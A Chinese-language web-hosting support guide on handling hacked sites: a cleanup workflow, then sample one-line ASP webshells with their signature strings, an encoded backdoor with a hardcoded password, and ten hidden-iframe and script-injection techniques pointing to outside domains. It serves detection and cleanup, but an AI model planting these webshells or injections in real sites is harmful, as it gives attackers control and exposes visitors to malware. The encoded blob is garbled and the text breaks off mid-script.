13693319568
我的网站被跳转,我的网站被放毒之类.
原因:网站存在后门<一句话木马或者webshell木马>,FTP密码泄露,客户本地电脑中毒,服务器受ARP攻击,服务器被入侵.
处理方法:
受理问题
→通知客户先覆盖首页 →查看下同台的服务器其他站点有没有相同的情况→提交技术处理.
→索取客户资料
→登陆FTP
→上传查马工具
→绝对路径访问<客户网站域名/shell.asp>
→根据查马工具提示的关键字段进行分析→若未查到相关的关键字 通知客户更换FTP密码以及会员号密码→实在不行就通知客户暂停FTP观察.
→进行清理删除工作
→清除完毕以后
→通知客户不要保存一份干净的资料,不要再从本地上传资料到空间覆盖.
1.一句话 webshell木马知识
一句话木马例子:
<%eval request(chr(-24071))%>
eval(request
<%eval request("#")%>
//特征码:eval ()里面的值可以任意变换
<script language="vbscript" runat="server">
If Request("sykkk")<>"" Then Session("lcxMarcos")=Request("sykkk")
If Session("lcxMarcos")<>"" Then Execute(Session("lcxMarcos"))
</script>
//特征码:execute
<%If ReQueSt(chr(-23075))<>"" Then eXeCuTe(ReQueSt(chr(-23075)))%>
//特征码:Execute request 或 execute(request
<%if request("huamei")<>"" then Session("b")=request("huamei")
if Session("b")<>"" then execute Session("b")%>
<%if request("huamei")<>"" then Session("b")=request("huamei")
if Session("b")<>"" then execute Session("b")%>
//特征码:execute Session 或 execute(Session
webshell
大马例子:
海阳顶端网ASP木马
//特征码:0D43FE01-F093-11CF-8940-00A0C9054228
或查加密码代码,访问一下,就出来了哦.因为很多小黑把大马加密了免杀.
2.网站被跳转例子:
HTML代码如:
(1).<META HTTP-EQUIV="Refresh" CONTENT="0.01;URL=http://www.67791.com">
(2).<script language="JScript.Encode" src=http://count30.53yes.com/click.asp?id=309432890&logo=12></script>
(3).<iframe src=http://adwangzi.8866.org/ad/cc.htm width=0 height=0></iframe>
PHP代码如:
<SCRIPT>location.replace('http://tt66888.cn');</SCRIPT>
ASP代码如:
<iframe src="http://new.3332333.com" width=0 height=0 style="CURSOR: url(http://New.3332333.com/bg.jpg)"></iframe>
"></iframe){kind=link}
一般具备加密,危险组件,等
<%eval(request("&_&"))%>
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>
eVaL(ReQueSt("?"))
<%
UserPass="zzs7758" //后门密码的
mName="。" ///后门版全
Copyright="注:请勿用于非法用途,否则后果作者概不负责"
#@~^AAUAAA==@#@&?nM\DRUmMrwDKr:W;O{,,O1,O,,O@#@&I/aWU/n ~EW0.P{Y.;@#@&6U,2.DK.,InkEs+Pg+XO@#@&?;A,?46S2I"c#@#@&P,(WPADMPPC3H@#@&~P,~IM?E@!(D@*@!C,t.+6xELC7lkmDbwDltb/OWMX 8mm3vbB@*@!4M@*'x(/aiEP'~AD.R93/;D(KDkrH~LPE@!JC@*@!8M@*r@#@&,P,~+"D md2C]=I+kKr ?+cosEUt@#@&~PnU9Prs@#@&2gf~j!A@#@&d!4~DMdv?PM#@#@&d"+UKW /3RSI(O`?D]#@#@&+ [~?`A@#@&ojH/:k61,]+hlO4v?#@#@&,P.+a):tx"+hSb12vd~r-E~r-wE*@#@&UN,sE ^Oq}x@#@&WjU/DqGx,]IwCO4`/b@#@&P~IM3hbP4'"2w^b1n`k~E- 'JSE'J#@#@&+gNP6iUZDkKx@#@&j4b?Cx{E╋╁@*M+OUmz@!@*mz@!回返
服务器通常都有哪些常见挂马方式?
答:关于挂马方法教程以及网页木马自动生成器等互联网上较多,这里就几个常见的进行列举
(1)框架挂马
<iframe src=地址 width=0 height=0></iframe>
(2)js文件挂马
首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js, 则JS挂马代码为<script language=javascript src=xxx.js></script>
(3)js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
(4)body挂马
<body ></body>
(5)隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="'">http://www.xxx.com/muma.htm/"></iframe>';
(6)css中挂马
body {background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
(7)javascript挂马
<SCRIPT language=javascript> window.open ("地","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
(8)图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
(9)伪装调用
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
(10)高级欺骗
<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width
=800,height=600,left=10,top=10");
网站建设 北京网站建设 网页制作 燕郊网站建设